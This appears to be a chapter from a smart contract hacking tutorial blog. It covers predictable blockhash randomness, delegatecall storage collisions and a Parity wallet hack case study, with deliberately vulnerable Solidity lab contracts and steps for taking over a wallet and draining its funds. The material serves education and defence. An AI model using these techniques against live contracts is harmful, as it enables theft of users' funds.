This is our final free chapter in this smart contract hacking series, hopefully you enjoyed it, I am not sure what I am going to work on next, perhaps some malware analysis, reverse engineering or maybe some hacking in the cloud.
We are currently in 4th quarter and slammed with work so I wouldn't expect any more posts or the full blockchain release till after that eases up.
If you have any questions or comments you can hit us up at:
Within operations that require random values we generally
need a form of randomness coupled with our algorithm. If we do not have
sufficient randomness and large character sets, we would end up with
cryptographic collisions or predictable values depending what we are doing. This
Is often the case in video game operations and data security encryption
schemes. For example, we do not want to create random values which are
predictable and repeatable based on known values or controllable values. With
controllable values an attacker could duplicate the value by reverse
engineering how it was originally created and what that random seed is. Also,
If the value is predictable within a game, we may be able to cheat the game by
creating our own valid values that exploit the perceived randomness.
Now we are not going to deep dive into cracking cryptography
or brute forcing hash values. First off it takes too much time and effort. Secondly
because there are easier more efficient ways of tackling cryptographic issues. Lastly,
we do not have time for rabbit holes in a week-long penetration test that require
us to explore many other attack vectors. Wasting a whole week on cracking a
single cryptographic issue would be a terrible and inefficient penetration test
leaving the rest of the target vulnerable. This may be suitable for R&D or
a CTF but not for a penetration test.
What you need to understand is that certain functions often
used as randomness on the blockchain is not suitable as a source of randomness.
Additionally, understanding how things are implemented will get you much
farther when it comes to cryptography then attacking it directly. You do not
need to break NSA level encryption by attacking it directly. Instead you should
concentrate on finding insecure implementations of these algorithms to get what
you need.
Oracle padding attacks are a great example of this if you
were in the hacking community back in the late 2000s. The padding attack relied
on error messages based on padding within blocks to determine a way to decrypt
them. This was a brilliant attack vector as you didn’t need to understand deep cryptographic
concepts to decrypt data blocks only how blocks work and how it was implemented.
With this knowledge you could leverage
the flawed implementation to get the decrypted values.
On the blockchain there are a number of insecure functionality
that developers like to use when implementing random values. Most of these are
very bad ideas for reasons we will discuss below.
For Example, the following non-exhaustive but often used list
of values are not suitable for randomness within sensitive operations. Usage of
these types of values for any sort of calculation is always suspect for closer
review:
üSecret keys in private variables
üBlock Timestamps
üBlock Numbers
üBlock Hash values
Why you ask? Well regardless of the data being set as
private on the blockchain a private variable storage value is 100% readable on
the blockchain. There are no secret values. These can be queried as you saw in
the storage issues chapter. Also embedding hard coded values are certainly not
private as they are in the source code which may be posted directly on the
blockchain. Or could be reverse engineered out of the bytecode used to deploy
the contract when the source code is not available. If you can get a hold of
that value, then you can violate the security of that functionality.
Secondly do not rely on predictable values for randomness
especially from block data sources. Block timestamps are controlled by miners
which can aid in orchestrated attacks when used as a source of randomness. Also
block numbers are easy to query and create predictable attacks when used in calculations,
if internal functions are using a block number, they are all using the same
PRNG. Finally, block hash values are terrible to use for randomness as only the
last 256 block hash values on chain actually have a real value. Anything older than
256 is reduced to 0 meaning that every calculation will use the same value of
0. We will cover that in some of our examples.
This is not an exhaustive list but instead just a small
portion of bad decisions for random values. There are plenty of other values
which could be used within calculations as a random seed which are also
predictable. It is always important to review the data used in these
calculations when reviewing smart contract functionality. So, without the need
of a PHD in cryptography you should easily discern that all of the above
implementation examples are terrible for the inclusion of random data within cryptographic
operations.
Let’s start out taking a look at a simple example of using a
blockhash value with a blocknumber value. While a hash of a block might seem
like a good idea as a random number there are numerous issues with it. Firstly,
a blocknumber is a known value set by a miner that persists for a set length of
time and can be queried and used in an attacker’s similar algorithm to produce
the same result and bypass controls. But there is also an underlying vulnerability
to this approach when coupled with a blockchash which we will take a look at
below.
Action Steps:
üOpen up your terminal and launch ganache-cli
üType out the code below into Remix
üWithin the Deploy Environment section dropdown
change the JavaScript VM to the web3 Provider option.
üDeploy the contract to ganache with the deploy
button in Remix
1. pragma solidity ^0.6.6;
2.
3. contract simpleVulnerableBlockHash {
4. uint32 public block_number;
5. bytes32 public myHash;
6.
7.function get_block_number() public {
8. block_number = uint32(block.number);
9. }
10.
11.function set_hash() public{
12. myHash = bytes32(blockhash(block_number));
13. }
14.
15.function wasteTime() public{
16.uint test = uint(block.number);
17. }
18. }
The simple contract above is querying for the current block number
in the get_block_number function on line 8 and storing it within a block_number
variable created on line 4. This is the
current block number running on the blockchain.
Then we have a function on line 11 which takes the block
number and uses it with the blockhash button to retrieve the blockhash and
store it in the myHash variable.
üWhat happened and what implications would this
have on calculations your using this value with?
So, we have 2 variables of a block number and a block hash
associated with that block number. What’s the big deal. Well let’s walk through
this step by step and then play around with the remaining wasteTime function on
line 15 to find out.
Starting out if we have the deployed contract and we execute
the get_block_number function followed by the set_hash function we will get the
following result when checking the block_number and myHash variables.
We see the blocknumber of 3 and then a hex value
representing the block hash that starts with 0x995f. Now if we were to use this
hash as a random value or within some algorithm to create a random value it
might work depending what we were doing and the level of security required for
the length of time we need it to be perceived as random for. It wouldn’t be
secure but maybe good enough for your operations. However, a blockhash has a dark little secret
a developer may not be aware of. Block
hashes in Ethereum have short term memory when it comes to blocks older than
256 from the current block.
So, what happens when we calculate a block after a time
lapse? Let’s give that a try by executing the wasteTime button till we reach
block 259. Waste time sets a block value
and discards it to enumerate blocks for us, it doesn’t actually make any real
changes. Normally blocks on the Ethereum network enumerate on their own every
30 seconds and we would simply just wait for 256 blocks, but we don’t have
traffic on our blockchain so we will enumerate it ourselves with wasteTime.
After we reach block 259 we execute the set_hash function
again which will take block_number of 3 which is older than 256 blocks and get
the hash. If you retrieve the myHash variable again after executing the
set_hash function again it results in:
You will notice the myHash variable is now 0x000. because
blocks older than 256 from the current block are not stored and result in a value
of 0. Having a predictable value of 0 in
our random algorithm can very likely create a situation where it would be easy
to recreate the random number to bypass or cheat functionality in the smart
contract.
Video Walkthrough of Bad Randomness:
A classical terrible example is something similar to this.
1.Function checkWinner()public payable {
2. If(blockhash(blockNumber)%2==0){
3. Msg.sender.transfer(balance);
4. }
5.}
In the example above uses a blockhash function with a
blockNumber variable within its calculation. The issue with this calculation is
if that blockNumber variable is more than 256 blocks old it will return Zero
and based on the calculation the user will win every single time.
All the attacker would need to do is play the game to create
the blocknumber variable. Then the attacker would simply wait for 256 blocks to
pass before checking if he has won the game. By doing this the attacker would
guarantee a win.
In order to see how this would work let’s take a look at a
simple game of chance that implements this concept.
Action Steps:
üType out this code within remix
üDeploy the code using Ganache and Web3 options
üTry to locate the vulnerability within the code
üTry to exploit the vulnerability this code so
that you are always the winner
The best way to prevent these issues is to avoid on chain
predictable values or secret values as your seed to operations and
calculations. We can do this with
trusted external Oracles. Oracles are
external data sources that your contract can use when it needs random values or
trusted data. There are projects that
specifically solve this problem for example ChainLink which has networks of
Oracle nodes that handle data queries and provide back trusted verified data
including random numbers. A simple example
for using Chainlink for a random number is found at the following link:
It is always a good idea to avoid on chain secret data or
block related information when performing any sort of sensitive operation and
instead utilize an Oracle.
Often while
writing smart contracts we will want to call functions within other contracts
either to leverage functionality within the other contract or for upgradability
reasons. We can do this by leveraging libraries with Delegate Calls. There are
various reasons to do this, including code re-use cost savings avoiding
re-deploying large libraries. We will take a look at this while reviewing the
technical details of the Parity Wallet hack at the end of this chapter. But first
let’s discuss some other aspects and nuances of the delegate call so we are
comfortable with how they work and how we can use them in attacks.
We have seen multiple ways to interact with external
contracts for example using the ABI of a contract with Web3 calls. We have also
created interfaces to a contract when creating our malicious attacking
contracts. Now we will expand on this using low level delegate calls to
external contracts.
In this section we will show how to interact with other
contracts using lower level functions such as, call and delegate call. We will
show how the code can leverage the functionality of another contract using
delegate calls within Solidity. Beware, that as usual whenever you use lower
level functions within solidity, bad bad things can and will happen.
Firstly, let’s just define some terms so that I don’t
confuse myself and I don’t confuse the readers because this can get a bit
confusing if we don’t know which contract, we are discussing. So, I am going to
label the following two terms upfront so we can distinguish which contact we
are discussing and how they are interacting. If we don’t do this, we are going
to end up confused. This particular vulnerability and how it works took me a
minute to wrap my head around. I actually had to deploy contracts and play with
code interactions before it made sense.
I hope to save you the trouble, since there were no good resources when
I started learning this.
We will define two contracts as the following for the
purposes of the code examples we are analyzing.
üCalling contract: The calling contract we
are interacting with through our DApp
üLogic Contract: The library contract
holding some kind of business logic we call with delegate call or call
With that out of the way let’s get back to confusing myself
along with you.
We often see delegate calls used when we don’t have an ABI
interface and as an upgradability pattern within solidity. In order to explain delegate
call we are going to first talk about the differences between a regular call
and a delegate call and what the results are with each of these call types.
Delegate calls are used to call the functionality of the
logic contract but have the changes reflected in the context of the calling
contract. It essentially behaves as if you imported the functionality of the
logic contract into the calling contract and the changes are reflected in the
context of the calling contract. This behaves much like importing libraries
when you are coding large projects and using that functionality as if it were
part of your project.
Vs
The regular call acts more like a remote API where we are
making changes on the remote logic contract rather than our calling contract. When
using a regular call, we are calling the logic contract but the effects of that
are retained within the logic contract. Rather than in the context of the
calling contract.
I know I know, I just confused you so let’s look at a simple
example and talk about the outcomes of each instance depending on if we are
using call or delegate call:
The best way to start to understand delegate calls are to
actually play with them. Deploy the above contract within Remix and play around
with it for a few minutes before reading the code walkthrough.
Also note you can review the video walkthroughs to see this
in action. But make sure that you have the contract open in Remix and you are
following along, this is essential to your learning and retention of these concepts.
Note that the above code comprises of two contracts within one
Solidity file, which will deploy without any issues in Remix and provide you
with both the logic contract and the calling contract. The calling contract
will have the functionality that you will be interacting with. So just paste it into Remix, compile and
deploy it.
I have also supplied a bit of code that automatically grabs
the Logic contract address via a call on line 14 since they are both in the
same file. Automatically grabbing the second contracts address is useful when
you’re debugging so you don’t have to deploy the first contract and manually
add it every time you change the code and redeploy.
Things to try on your own before continuing:
üDeploy the above code as a single Solidity file
in Remix and review the address of CallingContract.
üClick the print_my_delegate button and review
the output in the logs section of the transaction.
üClick the print_my_call button and review the
output in the logs section of the transaction.
Now that you have interacted with this code a bit within
Remix, let’s break it down piece by piece talk through some of the code, then
do a walkthrough and explain the results.
6.function print_address() public returns(address){
7. returnedAddress = address(this);
8. emit contractAddress(returnedAddress);
9. }
10. }
The logic contract is pretty simple. We create an address
variable named returnedAddress on line 3 which holds the value of the returned
address from the print_address function.
On line 7 we get the current address of the contract with the this
keyword. This is kind of like self in python which says give me the
variable value associated with the current instance of the object, in this case
the address of the current contract based on context in which it has been
called. In order to view this variable, we issue an Event on line 8 simply
printing out the current value of the contract address.
In order to make use of the logic contract we have the
CallingContract which is shown below:
First thing to notice on line 2 is the use of the exact same
returnedAddress variable from the LogicContract. This is important when using
delegate calls as the call will modify that variable locally on the calling
contract from the Logic contracts remote functionality. If this variable does not exist it cannot be
set, you should always have the same variables in each contract and have them in
the correct order when using delegate call. We will talk more about variables and their
behavior with delegate calls shortly when manipulating memory elements.
Next you will notice two functions, one function that is
using a call on line 9 and one that is using a delegatecall on
line 6.
We will see the differences with using each of these call
types. Both of these functions are calling the same print_address function from
the LogicContract using the logic_pointer address variable created on line 3. The logic_pointer variable is simply the
address of the logic contract so our calls know where they are directed to. These
two calls look very similar but that is where the similarities end as we will
see in the following walkthrough.
Note: You will also notice some strange syntax wrapping our
call to print_address using abi.encodeWithSignature. This is just simply an encoding mechanism
before sending our data with our calls. Similar to encoding web calls with
base64 except that delegate call only accepts a single un-padded bytes argument.
It’s nothing special, it’s just the way we need to encode the data on these
types of calls.
Deploying our Simple Example:
Actions to take:
üDeploy the contract in remix
üClick the print_my_call_address button
üClick the print_my_delegate_address button
The deployed contract should look similar to the following
showing the contract address for CallingContract and the two functions
available to us:
After you deploy the contract you will want to take note of
the address of the CallingContract. In this example above the buttons you will
see the calling contract address starts with the values 0x75A. Write the
address of your contract down, as this contract address will be important when
reviewing the output of the two functions print_my_call_address and
print_my_delegate_address.
First let’s review the output of using a regular call to the
logic contract. When we click the print_my_call_address button you will see a
new transaction post in the transaction window below the code.
Click the down arrow to view the transaction details and you
should see output similar to the following under the logs section.
The output shows the event that emitted when the logic
contract code was called with the returned address parameter coming from this. Notice that this is not the same address as
our calling contract. This is the address of our LogicContract.
Next click the button for print_my_delegate_address. Again,
check out the transaction window and click the down arrow to view the
details. Within the logs section of the
transaction you will see a similar event action: ___________________________________________________________________________________
This time note that the address returned is your
CallingContract address that starts with 0x75. This is because with delegate
call the code was run as if it was imported into the CallingContract using the
context of the CallingContract for the returnedAddress variable posted to the
event.
Now let’s quickly go over how variables work within delegate
calls and the importance of properly aligning these variables so they do not
overwrite the wrong memory locations. In
our example above we saw that we can execute code from the logic contract in
the context of the caller. This is also
true for the storage in the contract. Both the code and the storage are based
on the context of the caller.
So, what does this mean?
It means that when we change the value of a variable using our logic
contract it will change the value of the variable within our calling contract
if a delegatecall is used. This can be quite dangerous and lead to disastrous
results as you will see in our Case Study of the Parity Wallet attack
walkthrough at the end of this chapter.
For now, let’s go over a simple example of what happens in
memory when variables are incorrectly handled with delegatecall.
This example
follows the same structure as the previous contract of having both the logic
and calling contract in the same solidity file and retrieving the logic
contracts address automatically for convenience.
Things to note:
üThere is only a single functionality between
these contracts that sets the value of “a”.
üThree variables are set in the calling contract
“a”, “b” and “logic_pointer”
üOne Variable is set in the logic contract “a”
üA delegate call is used in the calling contract
to set the value of “a” using the set function from the logic contract.
Action Steps:
üTake note of the ordering of the variables
between the two contracts.
üType out this code into remix and then deploy
the CallingContract
üClick the b and a button and review their values
üNow click the setA button and review the values
again
In the action steps above you would have
noticed that when you set the value of “a” the value of “b” was the value that
changed. Why is this?
So, we have to start thinking in which
context we are using when calling the contract. The image below should help to
clear this up. Take a look at that image
for a minute and try to think about what happened.
So, in the calling contract we have “b”, “a” and
“Logic_Pointer”. Then we have the variable “a” in the logic contract. When
using a delegatecall we are executing the set function in the logic contract
under the context of the calling contract which has those 3 variables with “b”
being the first variable. You see where I am going with this? Essentially the logic contract only knows
about the “a” variable and sets the first element in the memory to that value.
However, we are in the context of the calling contract, and the calling
contracts first memory slot is the variable “b”.
So, what happens is when we initially deploy the contract,
we have the following where both “a” and “b” equal 5.
Then we click the setA button to execute the delegatecall into
the set function in the logic contract and this results in “a” remaining at the
value of 5 but “b” is updated to the value placed in the setA function. In this
case I used the value of 3.
The b value is overwritten because it is the first slot
defined in the memory of the calling contract and the logic contract only knows
about a single variable “a” in its own contract thus overwriting the value in
the first slot of memory. Since we used
delegate call we are not writing the memory in the logic contract but instead
the calling contract.
Take a minute to let that all sink in. Review the picture
from above with the memory slots. Think about the previous example of what
context you are in when using delegate call. Then come back to this and check
out the case study of this in action for a multi-million dollar theft in real
life.
When it comes to attacks against misconfigured smart contracts
with delegate calls the most famous of the attacks was the Parity Wallet hack
which resulted in a multi-million-dollar losses. I will briefly but with detail
discuss what one of the parity attacks entailed. This should bring together
when you learned into a real-world example.
The vulnerable Parity contract we are referencing is located
at the following address:
Essentially the parity wallet was a multi-signature wallet
which was extremely lightweight and relied on functionality from a main library
contract. Using libraries is a way of saving costs as wallets will be deployed
multiple times on the blockchain and the fee to deploy contracts is based on
the size of the instructions used in the contract. Less instructions on a
smaller lightweight wallet equals less overall transaction payments. By
deploying the main functionality within a callable library, the code only
incurred a onetime fee for the larger codebase. Each additional deployed
contract comes at a much smaller cost due to its reduced size of instructions.
This is fantastic from both a cost savings and upgradeability perspective,
depending how you deploy the functionality and how you handle access to
libraries.
But the Parity wallet had a few shortcomings due to a
combination of public initialization functions that lacked a usage state and
authorization issues. Authorization issues allowed direct calls after initial
contract deployment and delegate calls allowed attackers to interact with
initialization functions in the context of the calling contract.
Parity Issues that allowed an Attack:
üAn attack Vector into the library via the wallet
(DelegateCall in a Fallback function)
üInitialization functions that didn’t check a
wallets current initialization state
In this attack an attacker could gain control of the library
via a public initialization function. Once the attacker gained control of the
library via the initialization function, he was able to send two transactions.
The first transaction was to take ownership of the contract found at the
following link:
Browse to the above URL and click the “click to see more”
link to review the live data from the output also showed and described in
detail below. The transaction Input data shown made a call to the initWallet
function. This call overwrote the owners of the contract with the attacker’s
address at [4] within the input data section.
Let’s go into a little detail as to what the transaction
values above are and how they were derived. This will help in understanding
what is going on with this attack.
The data in the transaction can be broken down as the
following
üA 4byte MethodID
üFive 32-byte values
The 4-byte MethodID which precedes the function parameters
is the first 4 bytes of a sha3 hash of the initWallet method declaration. We
can derive the sha3 value from the transaction by using the web3 utility
functions and a substring of the sha3 output. You can try this out with the
following commands.
The 5 parameters following the MethodID are defined as
follows:
ü[0] Offset to the Owners Array length value:
60Hex or 96 bytes (3x32 = 96bytes to the Array length held at [3])
ü[1] How many owners are needed (Zero)
ü[2] Daily spending limit of the contract (A
Large Number)
ü[3] Owners Array Length of 1 owner
ü[4] Attackers address value as the only address
in the owner’s array
A second
transaction shown below, was then sent which transferred _value at [1] to the
supplied _to address at [0] within the data section of the following
transaction
Within the
parity wallet there was a default payable function also known as a fallback
function which used a delegate call into the wallet library. Fallback functions
are called when a call is made to a contract and no function is specified while
sending value to a contract. Using this functionality an attacker was able to
access the fallback function and leverage the delegate call by calling the
contract and NOT specifying a function but specifying msg.data with the target
and values shown in the above exploit.
Fallback
functions are often used as a catchall within contracts. I kind of think of
them as the default from a switch statement or the else clause in a block of
logic. You will see fallback functions aid us in many attacks for example
tx.origin and reentrancy attacks. You also saw the usage of fallback functions
in our chapter on reentrancy, when we used the functionality of a fallback
function to loop through the contract calls and siphon value from the contract.
Taking a look
at line 431 of the source code from the above link, this fallback function
exposes all public functions of the wallet library to anyone with the fallback
functions ability to send data into the wallet library via a delegatecall in
the context of the calling contract on line 436. No worries, will explain context in a minute
in our how delegate calls work section.
Notice that on line 435, the code logic states that if there
is data within the transaction greater than 0 a delegate call is made which
calls the wallet library in the context of the calling contract. We showed this above with the actual
transaction data. But from a higher level the attacker used this logic to pass
data to the wallet contract to perform the following to actions:
1.First calling the initWallet function as in the
first transaction data we showed.
2.Followed by the execute function to both take
ownership of a wallet via the wallet’s fallback functionality and then transfer
out the wallet’s funds.
In order to perform this attack, all the attacker needs to
do is:
üMake a transaction call to the wallet address
üNot specify a function in the in the wallet in
order to invoke the fallback function
üSend msg.data with the values we saw in the
attack transactions above
The fallback function will capture this transaction and
forward it to the wallet library for us via a delegate call.
This attack resulted in millions of dollars of losses for
users of the Parity wallet. I wanted to show an example of a real-world attack
so you could see how it was constructed and know how serious this issue
is. Millions of dollars can be lost with
a relatively simple attack, in this case 31 million.